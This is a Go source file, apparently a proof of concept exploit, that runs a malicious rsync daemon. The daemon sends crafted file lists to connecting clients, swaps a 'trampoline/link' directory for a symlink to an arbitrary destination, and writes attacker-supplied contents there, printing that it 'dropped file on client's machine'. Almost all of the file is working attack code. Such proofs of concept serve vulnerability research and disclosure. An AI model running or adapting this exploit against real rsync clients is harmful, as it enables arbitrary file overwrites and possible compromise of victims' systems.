package main

import (
	"crypto/md5"
	"fmt"
	"net"
	"os"
	"path/filepath"
	"strings"

	"cvr.google.com/pkg/client"

	"flag"
)

// IncRecurse is the flag that tells the server to recurse into the directories
const IncRecurse = 1

// FileListOffset is the offset to indicate we will send another file list
const FileListOffset = 101

func makeClientDownloadItem(file *client.File, rootFl *client.FileList, srv *client.RsyncClient, transfer bool) error {
	// get the target index for the regular file
	targetIndex, err := rootFl.IndexFor(file)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to get target index: %v\n", err.Error())
		return err
	}

	flags := 0
	if transfer {
		flags |= client.ItemTransferFlag
	}

	// first send the target index
	err = srv.WriteNdx(targetIndex)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write target index: %v\n", err.Error())
		return err
	}

	// now send the transfer flags
	err = srv.WriteShortInt(flags)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write transfer flags: %v\n", err.Error())
		return err
	}

	return nil
}

func writeNdxAndAttrs(srv *client.RsyncClient, ndx int, flags int, basisType byte, xname string) error {
	srv.WriteNdx(ndx)
	srv.WriteShortInt(flags)
	if flags&client.ItemBasisTypeFollows != 0 {
		srv.WriteByte(basisType)
	}

	if flags&client.ItemXnameFollows != 0 {
		srv.WriteVString(xname)
	}
	return nil
}

// handles the logic of send_files. Returns true if the client should exit
func handleSenderProxy(srv *client.RsyncClient, targetFile *client.File) (bool, error) {
	ndx, err := srv.ReadNdx()
	if err != nil {
		return false, err
	}

	// this path is taken for the actual file generation. Read the index,
	// sums and then relay them back to the client
	if ndx >= 0 {
		// we now read the xfer flags
		flags, err := srv.ReadShortInt()
		if err != nil {
			return false, err
		}
		basisType := byte(0)
		if flags&client.ItemBasisTypeFollows != 0 {
			basisType, err = srv.ReadByte()
			if err != nil {
				return false, err
			}
		}

		xname := ""
		if flags&client.ItemXnameFollows != 0 {
			xname, err = srv.ReadVString()
			if err != nil {
				return false, err
			}
		}

		// if we're not transferring the file, we're done
		if flags&client.ItemTransferFlag == 0 {
			return false, writeNdxAndAttrs(srv, ndx, flags, basisType, xname)
		}

		// otherwise we need to read the sums
		count, err := srv.ReadInt()
		if err != nil {
			return false, err
		}

		blength, err := srv.ReadInt()
		if err != nil {
			return false, err
		}

		s2length, err := srv.ReadInt()
		if err != nil {
			return false, err
		}

		remainder, err := srv.ReadInt()
		if err != nil {
			return false, err
		}

		// this data isn't relayed to the client. Just consume it
		sum2buf := make([]byte, s2length)
		for i := 0; i < count; i++ {
			_, err := srv.ReadInt()
			if err != nil {
				return false, err
			}
			err = srv.Read(sum2buf)
			if err != nil {
				return false, err
			}
		}

		// now send the ndx and attrs
		writeNdxAndAttrs(srv, ndx, flags, basisType, xname)

		// send the sum head back
		srv.WriteRawInt(count)
		srv.WriteRawInt(blength)
		srv.WriteRawInt(s2length)
		err = srv.WriteRawInt(remainder)
		if err != nil {
			return false, err
		}

		// if this is a file transfer, most likely it's the targetFile.
		// TODO: Make this PoC compatible with multiple file transfers

		// send simple token for the filewrite
		srv.SendToken(targetFile.Content)

		// now send the Digest
		srv.Write(targetFile.Digest)

		// we're now done with the PoC. Tell the client to exit
		return true, srv.SendExitMessage()
	}
	// easy case
	if ndx == client.NdxDone {
		return false, srv.WriteNdx(client.NdxDone)
	}

	return false, nil
}

func poc(conn net.Conn, sourceContents []byte, sourceChecksum []byte, targetFileName string) {
	srv := client.NewRsyncServer(conn)
	defer srv.Close()

	// prologue. The daemon greeting
	srv.WriteLineOld("@RSYNCD: 31.0 md5")

	// consume the greeting of the client
	line, err := srv.ReadLine()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read line: %v\n", err.Error())
		return
	}

	// the next line is either the module or the listing command
	line, err = srv.ReadLine()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read line: %v\n", err.Error())
		return
	}

	// if they're just listing, we're done
	if line == "#list" {
		srv.WriteLineOld("files")
		return
	}

	// send RSYNCD: OK
	srv.WriteLineOld("@RSYNCD: OK")

	// parse some of the relevant flags the client sends
	arguments := ""
	for {
		arg, err := srv.ReadLine()
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to read line: %v\n", err.Error())
			return
		}

		if arg == "" {
			break
		}

		arguments += arg + " "

	}

	fmt.Printf("[*] Client %v connected with arguments: %s\n", conn.RemoteAddr(), arguments)

	// compat flags. Set the inc_recurse flag to 1
	err = srv.WriteVarInt(IncRecurse)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write compat flags: %v\n", err.Error())
		return
	}

	// TODO: The client sometimes sends negotiation strings. We should probably handle those
	// as well.

	// send the checksum seed
	err = srv.WriteRawInt(1337)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write checksum seed: %v\n", err.Error())
		return
	}

	// at this point, enable multiplexing
	srv.EnableMultiPlexOutbound()
	srv.EnableMultiPlexInbound()

	// the client now sends filter lists. The client sends length + the filter. Parse until
	// we get a 0
	for {
		filterLen, err := srv.ReadInt()
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to read filter length: %v\n", err.Error())
			return
		}

		if filterLen == 0 {
			break
		}

		// consume the filter
		err = srv.Read(make([]byte, filterLen))
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to read filter: %v\n", err.Error())
			return
		}
	}

	// we will now send file lists - first comes the base file list
	// this is for the root directory
	rootFl := client.NewFileList()
	rootFl.AddDir(".")
	rootFl.AddDir("trampoline")
	err = rootFl.Send(srv)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err.Error())
		return
	}

	// we will now send a second file list. This creates a directory called "link" in the
	// "trampoline" directory. We will change this directory to a symlink later
	srv.WriteNdx(-1 - FileListOffset)

	subdirFl := rootFl.NewChildList()
	subdirFl.AddDir("./trampoline/link")
	err = subdirFl.Send(srv)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err.Error())
		return
	}

	// now send the file list for directory "link"
	srv.WriteNdx(-2 - FileListOffset)

	fileFl := rootFl.NewChildList()
	targetFileBasename := filepath.Base(targetFileName)
	targtFile := fileFl.AddRegularFile(fmt.Sprintf("./trampoline/link/%s", targetFileBasename), sourceContents)
	targtFile.Digest = sourceChecksum
	err = fileFl.Send(srv)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err.Error())
		return
	}

	// now send another file list for the same directory. Change the type to symlink and create the file
	srv.WriteNdx(-1 - FileListOffset)

	symlinkFl := rootFl.NewChildList()
	destinationDir := filepath.Dir(targetFileName)
	symlinkFl.AddSymlink("./trampoline/link", destinationDir)
	err = symlinkFl.Send(srv)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err.Error())
		return
	}

	for {
		// handle any indexes that might come our way
		done, err := handleSenderProxy(srv, targtFile)
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to handle sender proxy: %v\n", err.Error())
			return
		}

		if done {
			break
		}

	}

	fmt.Printf("[+] Dropped file on client's machine. Closing connection")

}

var port = flag.Int("port", 1337, "port to listen on")
var checksumSeed = flag.Int("checksum_seed", 1337, "checksum seed to use")

func main() {
	flag.Parse()
	args := flag.Args()
	if len(args) != 1 {
		fmt.Println("Usage: poc sourceFile:targetFilePath")
		os.Exit(1)
	}

	// read the file and create the checksum in advance
	fileParts := strings.Split(args[0], ":")
	if len(fileParts) != 2 {
		fmt.Println("Usage: poc sourceFile:targetFilePath")
		os.Exit(1)
	}
	sourceFile := fileParts[0]
	targetFile := fileParts[1]

	sourceContents, err := os.ReadFile(sourceFile)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read source file: %v\n", err.Error())
		os.Exit(1)
	}

	h := md5.New()
	h.Write(sourceContents)
	sourceChecksum := h.Sum(nil)

	listener, err := net.Listen("tcp", fmt.Sprintf(":%v", *port))
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to listen: %v\n", err.Error())
		os.Exit(1)
	}

	fmt.Println(fmt.Sprintf("[*] Listening on port %v", *port))
	for {
		conn, err := listener.Accept()
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to accept: %v\n", err.Error())
			os.Exit(1)
		}

		fmt.Println("[*] New connection from ", conn.RemoteAddr())
		go poc(conn, sourceContents, sourceChecksum, targetFile)
	}
}
